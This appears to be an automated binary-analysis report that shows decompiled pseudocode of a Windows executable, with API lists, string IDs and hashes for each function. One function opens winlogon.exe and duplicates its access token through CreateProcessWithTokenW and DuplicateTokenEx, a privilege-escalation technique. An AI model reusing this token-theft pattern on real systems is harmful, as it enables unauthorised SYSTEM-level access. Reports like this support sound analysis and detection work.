                                                                                                  						_t21 = _t21 + 1;
                                                                                                  						if(_t21 < _t40) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L5;
                                                                                                  						}
                                                                                                  						goto L6;
                                                                                                  					}
                                                                                                  					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                  				}
                                                                                                  				L6:
                                                                                                  				if(_t57 != 0) {
                                                                                                  					L21:
                                                                                                  					_t22 = _t57;
                                                                                                  				} else {
                                                                                                  					if((_t39 & 0x00010000) == 0) {
                                                                                                  						if( *0x40fb90 == 0) {
                                                                                                  							_push( *0x41c478 - 1);
                                                                                                  							_push( *0x41c45c);
                                                                                                  							_push(_t39);
                                                                                                  							_t25 = E00405CE7();
                                                                                                  							goto L15;
                                                                                                  						} else {
                                                                                                  							wcscpy(0x40fda0, L"strings");
                                                                                                  							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                  							_t62 = _t62 + 0x10;
                                                                                                  							if(_t35 == 0) {
                                                                                                  								L13:
                                                                                                  								_t25 = GetModuleHandleW(0);
                                                                                                  								_push( *0x41c478 - 1);
                                                                                                  								_push( *0x41c45c);
                                                                                                  								_push(_t39);
                                                                                                  								goto L15;
                                                                                                  							} else {
                                                                                                  								_t61 = wcslen( *0x41c45c);
                                                                                                  								if(_t61 == 0) {
                                                                                                  									goto L13;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t25 = GetModuleHandleW(_t57);
                                                                                                  						_push( *0x41c478 - 1);
                                                                                                  						_push( *0x41c45c);
                                                                                                  						_push(_t39 & 0x0000ffff);
                                                                                                  						L15:
                                                                                                  						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                  						_t71 = _t61;
                                                                                                  					}
                                                                                                  					if(_t71 <= 0) {
                                                                                                  						L20:
                                                                                                  						_t22 = 0x40c4e8;
                                                                                                  					} else {
                                                                                                  						_t27 =  *0x41c46c;
                                                                                                  						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                  							goto L20;
                                                                                                  						} else {
                                                                                                  							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                  							_t14 = _t61 + 2; // 0x2
                                                                                                  							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                  							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                  							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                  							 *0x41c468 =  *0x41c468 + 1;
                                                                                                  							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                  							if(_t57 != 0) {
                                                                                                  								goto L21;
                                                                                                  							} else {
                                                                                                  								goto L20;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t22;
                                                                                                  			}














                                                                                                  0x00405b81
                                                                                                  0x00405b88
                                                                                                  0x00405b8a
                                                                                                  0x00405b8a
                                                                                                  0x00405b8f
                                                                                                  0x00405b96
                                                                                                  0x00405b9b
                                                                                                  0x00405bad
                                                                                                  0x00405bad
                                                                                                  0x00405b9d
                                                                                                  0x00405b9d
                                                                                                  0x00405ba8
                                                                                                  0x00405bab
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405bab
                                                                                                  0x00405be9
                                                                                                  0x00405be9
                                                                                                  0x00405baf
                                                                                                  0x00405bb1
                                                                                                  0x00405ce2
                                                                                                  0x00405ce2
                                                                                                  0x00405bb7
                                                                                                  0x00405bbd
                                                                                                  0x00405bf6
                                                                                                  0x00405c4b
                                                                                                  0x00405c4c
                                                                                                  0x00405c52
                                                                                                  0x00405c53
                                                                                                  0x00000000
                                                                                                  0x00405bf8
                                                                                                  0x00405c02
                                                                                                  0x00405c0e
                                                                                                  0x00405c13
                                                                                                  0x00405c18
                                                                                                  0x00405c2c
                                                                                                  0x00405c2e
                                                                                                  0x00405c3b
                                                                                                  0x00405c3c
                                                                                                  0x00405c42
                                                                                                  0x00000000
                                                                                                  0x00405c1a
                                                                                                  0x00405c25
                                                                                                  0x00405c2a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405c2a
                                                                                                  0x00405c18
                                                                                                  0x00405bbf
                                                                                                  0x00405bc0
                                                                                                  0x00405bcd
                                                                                                  0x00405bce
                                                                                                  0x00405bd7
                                                                                                  0x00405c58
                                                                                                  0x00405c5f
                                                                                                  0x00405c61
                                                                                                  0x00405c61
                                                                                                  0x00405c63
                                                                                                  0x00405cdb
                                                                                                  0x00405cdb
                                                                                                  0x00405c65
                                                                                                  0x00405c65
                                                                                                  0x00405c74
                                                                                                  0x00000000
                                                                                                  0x00405c84
                                                                                                  0x00405c8a
                                                                                                  0x00405c8d
                                                                                                  0x00405c99
                                                                                                  0x00405caf
                                                                                                  0x00405cbd
                                                                                                  0x00405cc8
                                                                                                  0x00405cd4
                                                                                                  0x00405cd9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405cd9
                                                                                                  0x00405c74
                                                                                                  0x00405c63
                                                                                                  0x00405ce6

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                  • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                  • memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                  • String ID: strings
                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 75%
                                                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                  				char _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* __esi;
                                                                                                  				void* _t18;
                                                                                                  				intOrPtr* _t22;
                                                                                                  				void* _t23;
                                                                                                  				void* _t28;
                                                                                                  				int _t37;
                                                                                                  				intOrPtr* _t39;
                                                                                                  				intOrPtr* _t40;
                                                                                                  
                                                                                                  				_v8 = 0;
                                                                                                  				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                  				_v12 = _t18;
                                                                                                  				if(_t18 == 0) {
                                                                                                  					_t37 = GetLastError();
                                                                                                  				} else {
                                                                                                  					_t39 = _a4 + 0x800;
                                                                                                  					_a8 = 0;
                                                                                                  					E0040289F(_t39);
                                                                                                  					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                  					if(_t22 == 0) {
                                                                                                  						_t23 = 0;
                                                                                                  					} else {
                                                                                                  						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                  					}
                                                                                                  					if(_t23 == 0) {
                                                                                                  						_t37 = GetLastError();
                                                                                                  					} else {
                                                                                                  						_a4 = _a8;
                                                                                                  						E0040289F(_t39);
                                                                                                  						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                  						if(_t40 == 0) {
                                                                                                  							_t28 = 0;
                                                                                                  						} else {
                                                                                                  							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                  						}
                                                                                                  						if(_t28 == 0) {
                                                                                                  							_t37 = GetLastError();
                                                                                                  						} else {
                                                                                                  							 *_a12 = _v8;
                                                                                                  							_t37 = 0;
                                                                                                  						}
                                                                                                  						CloseHandle(_a8);
                                                                                                  					}
                                                                                                  					CloseHandle(_v12);
                                                                                                  				}
                                                                                                  				return _t37;
                                                                                                  			}













                                                                                                  0x00401e59
                                                                                                  0x00401e5c
                                                                                                  0x00401e64
                                                                                                  0x00401e67
                                                                                                  0x00401ef9
                                                                                                  0x00401e6d
                                                                                                  0x00401e70
                                                                                                  0x00401e76
                                                                                                  0x00401e79
                                                                                                  0x00401e7e
                                                                                                  0x00401e83
                                                                                                  0x00401e92
                                                                                                  0x00401e85
                                                                                                  0x00401e8e
                                                                                                  0x00401e8e
                                                                                                  0x00401e96
                                                                                                  0x00401ee6
                                                                                                  0x00401e98
                                                                                                  0x00401e9b
                                                                                                  0x00401e9e
                                                                                                  0x00401ea3
                                                                                                  0x00401ea8
                                                                                                  0x00401ebb
                                                                                                  0x00401eaa
                                                                                                  0x00401eb7
                                                                                                  0x00401eb7
                                                                                                  0x00401ebf
                                                                                                  0x00401ed3
                                                                                                  0x00401ec1
                                                                                                  0x00401ec7
                                                                                                  0x00401ec9
                                                                                                  0x00401ec9
                                                                                                  0x00401ed8
                                                                                                  0x00401ed8
                                                                                                  0x00401eeb
                                                                                                  0x00401eeb
                                                                                                  0x00401f01

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                  • String ID: winlogon.exe
                                                                                                  • API String ID: 1315556178-961692650
                                                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 79%
                                                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                  				int _v8;
                                                                                                  				char _v12;
                                                                                                  				void _v2058;
                                                                                                  				void _v2060;
                                                                                                  				int _t35;
                                                                                                  				int _t41;
                                                                                                  				signed int _t48;
                                                                                                  				signed int _t49;
                                                                                                  				signed short* _t50;
                                                                                                  				void** _t52;
                                                                                                  				void* _t53;
                                                                                                  				void* _t54;
                                                                                                  
                                                                                                  				_t48 = 0;
                                                                                                  				_v2060 = 0;
                                                                                                  				memset( &_v2058, 0, 0x7fe);
                                                                                                  				_t54 = _t53 + 0xc;
                                                                                                  				 *__ebx = 0;
                                                                                                  				_t52 = _a4 + 4;
                                                                                                  				_v12 = 2;
                                                                                                  				do {
                                                                                                  					_push( *_t52);
                                                                                                  					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                  					_push( *_t6);
                                                                                                  					_push(L"%s (%s)");
                                                                                                  					_push(0x400);
                                                                                                  					_push( &_v2060);
                                                                                                  					L0040B1EC();
                                                                                                  					_t35 = wcslen( &_v2060);
                                                                                                  					_v8 = _t35;
                                                                                                  					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                  					_t49 = _t48 + _v8 + 1;
                                                                                                  					_t41 = wcslen( *_t52);
                                                                                                  					_v8 = _t41;
                                                                                                  					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                  					_t54 = _t54 + 0x34;
                                                                                                  					_t52 =  &(_t52[2]);
                                                                                                  					_t23 =  &_v12;
                                                                                                  					 *_t23 = _v12 - 1;
                                                                                                  					_t48 = _t49 + _v8 + 1;
                                                                                                  				} while ( *_t23 != 0);
                                                                                                  				_t50 = __ebx + _t48 * 2;
                                                                                                  				 *_t50 =  *_t50 & 0x00000000;
                                                                                                  				_t50[1] = _t50[1] & 0x00000000;
                                                                                                  				return __ebx;
                                                                                                  			}















                                                                                                  0x00405241
                                                                                                  0x00405250
                                                                                                  0x00405257
                                                                                                  0x0040525f
                                                                                                  0x00405262
                                                                                                  0x00405265
                                                                                                  0x00405268
                                                                                                  0x0040526f
                                                                                                  0x0040526f
                                                                                                  0x00405277
                                                                                                  0x00405277
                                                                                                  0x0040527a
                                                                                                  0x0040527f
                                                                                                  0x00405284
                                                                                                  0x00405285
                                                                                                  0x00405291
                                                                                                  0x00405296
                                                                                                  0x004052a9
                                                                                                  0x004052b3
                                                                                                  0x004052b7
                                                                                                  0x004052bc
                                                                                                  0x004052ca
                                                                                                  0x004052d2
                                                                                                  0x004052d5
                                                                                                  0x004052d8
                                                                                                  0x004052d8
                                                                                                  0x004052db
                                                                                                  0x004052db
                                                                                                  0x004052e1
                                                                                                  0x004052e4
                                                                                                  0x004052e8
                                                                                                  0x004052f2

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                  • String ID: %s (%s)
                                                                                                  • API String ID: 3979103747-1363028141
                                                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 78%
                                                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                  				void _v514;
                                                                                                  				short _v516;
                                                                                                  				void _v8710;
                                                                                                  				short _v8712;
                                                                                                  				int _t17;
                                                                                                  				WCHAR* _t26;
                                                                                                  
                                                                                                  				E0040B550(0x2204, __ecx);
                                                                                                  				_v8712 = 0;
                                                                                                  				memset( &_v8710, 0, 0x2000);
                                                                                                  				_t17 = GetDlgCtrlID(_a4);
                                                                                                  				_t34 = _t17;
                                                                                                  				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                  				if(_t17 > 0 && _v8712 != 0) {
                                                                                                  					_v516 = 0;
                                                                                                  					memset( &_v514, 0, 0x1fe);
                                                                                                  					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                  					_t26 =  &_v516;
                                                                                                  					_push(L"sysdatetimepick32");
                                                                                                  					_push(_t26);
                                                                                                  					L0040B278();
                                                                                                  					if(_t26 != 0) {
                                                                                                  						E00406025(_t34,  &_v8712);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}









                                                                                                  0x00406157
                                                                                                  0x0040616d
                                                                                                  0x00406174
                                                                                                  0x0040617f
                                                                                                  0x00406185
                                                                                                  0x00406196
                                                                                                  0x0040619e
                                                                                                  0x004061b6
                                                                                                  0x004061bd
                                                                                                  0x004061d4
                                                                                                  0x004061da
                                                                                                  0x004061e0
                                                                                                  0x004061e5
                                                                                                  0x004061e6
                                                                                                  0x004061ef
                                                                                                  0x004061f9
                                                                                                  0x004061ff
                                                                                                  0x004061ef
                                                                                                  0x00406206

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                  • String ID: sysdatetimepick32
                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 68%
                                                                                                  			E00404706(long __edi, wchar_t* _a4) {
                                                                                                  				short _v8;
                                                                                                  				void* _t8;
                                                                                                  				void* _t10;
                                                                                                  				long _t14;
                                                                                                  				long _t24;
                                                                                                  
                                                                                                  				_t24 = __edi;
                                                                                                  				_t8 = 0;
                                                                                                  				_t14 = 0x1100;
                                                                                                  				if(__edi - 0x834 <= 0x383) {
                                                                                                  					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                  					if(0 != 0) {
                                                                                                  						_t14 = 0x1900;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                  					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                  				} else {
                                                                                                  					if(wcslen(_v8) < 0x400) {
                                                                                                  						wcscpy(_a4, _v8);
                                                                                                  					}
                                                                                                  					_t10 = LocalFree(_v8);
                                                                                                  				}
                                                                                                  				return _t10;
                                                                                                  			}








                                                                                                  0x00404706
                                                                                                  0x00404714
                                                                                                  0x0040471c
                                                                                                  0x00404721
                                                                                                  0x0040472b
                                                                                                  0x00404733
                                                                                                  0x00404735
                                                                                                  0x00404735
                                                                                                  0x00404733
                                                                                                  0x00404751
                                                                                                  0x00404780
                                                                                                  0x00404753
                                                                                                  0x0040475e
                                                                                                  0x00404766
                                                                                                  0x0040476c
                                                                                                  0x00404770
                                                                                                  0x00404770
                                                                                                  0x0040478a

                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                  • wcslen.MSVCRT ref: 00404756
                                                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                  • String ID: netmsg.dll
                                                                                                  • API String ID: 2767993716-3706735626
                                                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                  				intOrPtr _v12;
                                                                                                  				void* _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				char _v32;
                                                                                                  				char _v72;
                                                                                                  				void _v582;
                                                                                                  				long _v584;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr _t27;
                                                                                                  				wchar_t* _t34;
                                                                                                  				wchar_t* _t42;
                                                                                                  				long* _t43;
                                                                                                  				int _t44;
                                                                                                  				void* _t52;
                                                                                                  				void* _t54;
                                                                                                  				long _t56;
                                                                                                  				long* _t57;
                                                                                                  				void* _t60;
                                                                                                  
                                                                                                  				_t60 = __eflags;
                                                                                                  				_t52 = __edx;
                                                                                                  				E004095AB( &_v72);
                                                                                                  				_v584 = 0;
                                                                                                  				memset( &_v582, 0, 0x1fe);
                                                                                                  				E004095FD(_t52, _t60,  &_v72);
                                                                                                  				_t27 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				if(_v20 <= 0) {
                                                                                                  					L10:
                                                                                                  					_t56 = 0;
                                                                                                  				} else {
                                                                                                  					do {
                                                                                                  						_t57 = E00405A92(_t27,  &_v32);
                                                                                                  						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                  							goto L9;
                                                                                                  						} else {
                                                                                                  							_t34 =  &_v584;
                                                                                                  							_push(_t34);
                                                                                                  							_push(_a4);
                                                                                                  							L0040B278();
                                                                                                  							if(_t34 == 0) {
                                                                                                  								L5:
                                                                                                  								_t44 = 0;
                                                                                                  								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                  								if(_t54 == 0) {
                                                                                                  									goto L9;
                                                                                                  								} else {
                                                                                                  									_v16 = _v16 & 0;
                                                                                                  									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                  										_t44 = 1;
                                                                                                  										CloseHandle(_v16);
                                                                                                  									}
                                                                                                  									CloseHandle(_t54);
                                                                                                  									if(_t44 != 0) {
                                                                                                  										_t56 =  *_t57;
                                                                                                  									} else {
                                                                                                  										goto L9;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t42 = wcschr( &_v584, 0x5c);
                                                                                                  								if(_t42 == 0) {
                                                                                                  									goto L9;
                                                                                                  								} else {
                                                                                                  									_t43 =  &(_t42[0]);
                                                                                                  									_push(_t43);
                                                                                                  									_push(_a4);
                                                                                                  									L0040B278();
                                                                                                  									if(_t43 != 0) {
                                                                                                  										goto L9;
                                                                                                  									} else {
                                                                                                  										goto L5;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L12;
                                                                                                  						L9:
                                                                                                  						_t27 = _v12 + 1;
                                                                                                  						_v12 = _t27;
                                                                                                  					} while (_t27 < _v20);
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  				L12:
                                                                                                  				E004095DA( &_v72);
                                                                                                  				return _t56;
                                                                                                  			}





















                                                                                                  0x0040598b
                                                                                                  0x0040598b
                                                                                                  0x0040599a
                                                                                                  0x004059ae
                                                                                                  0x004059b5
                                                                                                  0x004059c1
                                                                                                  0x004059c6
                                                                                                  0x004059cb
                                                                                                  0x004059ce
                                                                                                  0x00405a7b
                                                                                                  0x00405a7b
                                                                                                  0x004059d4
                                                                                                  0x004059d4
                                                                                                  0x004059dc
                                                                                                  0x004059ee
                                                                                                  0x00000000
                                                                                                  0x004059f0
                                                                                                  0x004059f0
                                                                                                  0x004059f6
                                                                                                  0x004059f7
                                                                                                  0x004059fa
                                                                                                  0x00405a03
                                                                                                  0x00405a2b
                                                                                                  0x00405a2e
                                                                                                  0x00405a3c
                                                                                                  0x00405a40
                                                                                                  0x00000000
                                                                                                  0x00405a42
                                                                                                  0x00405a42
                                                                                                  0x00405a54
                                                                                                  0x00405a59
                                                                                                  0x00405a5a
                                                                                                  0x00405a5a
                                                                                                  0x00405a61
                                                                                                  0x00405a69
                                                                                                  0x00405a7f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405a69
                                                                                                  0x00405a05
                                                                                                  0x00405a0e
                                                                                                  0x00405a17
                                                                                                  0x00000000
                                                                                                  0x00405a19
                                                                                                  0x00405a19
                                                                                                  0x00405a1c
                                                                                                  0x00405a1d
                                                                                                  0x00405a20
                                                                                                  0x00405a29
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405a29
                                                                                                  0x00405a17
                                                                                                  0x00405a03
                                                                                                  0x00000000
                                                                                                  0x00405a6b
                                                                                                  0x00405a6e
                                                                                                  0x00405a72
                                                                                                  0x00405a72
                                                                                                  0x00000000
                                                                                                  0x004059d4
                                                                                                  0x00405a81
                                                                                                  0x00405a84
                                                                                                  0x00405a8f

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004059B5
                                                                                                    • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                    • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                    • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                    • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                    • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                    • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
